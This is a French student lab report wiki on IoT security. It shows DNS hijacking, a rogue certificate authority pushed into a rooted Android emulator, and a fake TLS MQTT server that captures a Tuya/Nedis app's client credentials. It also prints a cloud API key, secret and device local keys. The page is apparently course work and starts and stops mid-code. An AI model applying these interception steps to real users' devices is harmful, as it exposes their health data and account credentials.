print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autre de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IOT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assisant ou encore ... TinyTuya !

Spoiler alerte: J'ai du changer d'application et cette application ne tape plus sur la même adresse. Elle tape sur XX-eu.lifeaiot.com il a donc fallu refaire une redirection vers notre serveur pour ces nouvelles adresses.

Spoiler alerte: j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps il a fallu connecter l'appli à la platforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui c'est le même nom…) ne veux pas se connecter à la plateforme pour une raison inexplicable (et au vu du nombre de forum qui parle du sujet, je ne suis pas le seul).

J'ai donc du connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya est accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connecté à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices
TinyTuya (Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et la, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> on observe que le champs mapping est vide. Ce champs est censé afficher toute les données que TinyTuya est censé pouvoir récupérer … et il est vide …

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet de changer nous ampoules connecté en rouge si la balance affiche que notre objectif de poids est dépassé …

Affaire à suivre.

TODO : ne marche pas en local ? tenter d'enlever la redirection

<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard -force
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n):

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "D\u00e9tecteur de fum\u00e9e",
"id": "86730270483fda3155d0",
"key": "r@fAdR'PW~0O`v5@",
"mac": "48:3f:da:31:55:d0",
"uuid": "86730270483fda3155d0",
"sn": "1000716370419B",
"category": "ywbj",
"product_name": "Smoke detector",
"product_id": "inwnovped8h5aoaw",
"biz_type": 18,
"model": "WIFIDS20WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/651af99cad24017128e3dc2322461ae5.png",
"mapping": {
"1": {
"code": "smoke_sensor_status",
"type": "Enum",
"values": {
"range": [
"alarm",
"normal"
]
}
},
"14": {
"code": "battery_state",
"type": "Enum",
"values": {
"range": [
"low",
"middle",
"high"
]
}
}
}
},
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {}
}
]

>> Saving list to devices.json
2 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
Scan network 172.16.10.0/24 from interface eth0? ([Y]es/[n]o/[a]ll yes):
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
0 local devices discovered

Polling local devices...
[Détecteur de fumée ] Error: No IP found
[Pèse pas que des personne] Error: No IP found

>> Saving device snapshot data to snapshot.json

Done.

</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-13T13:12:04Z

Vdetrez : /* TinyTuya */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
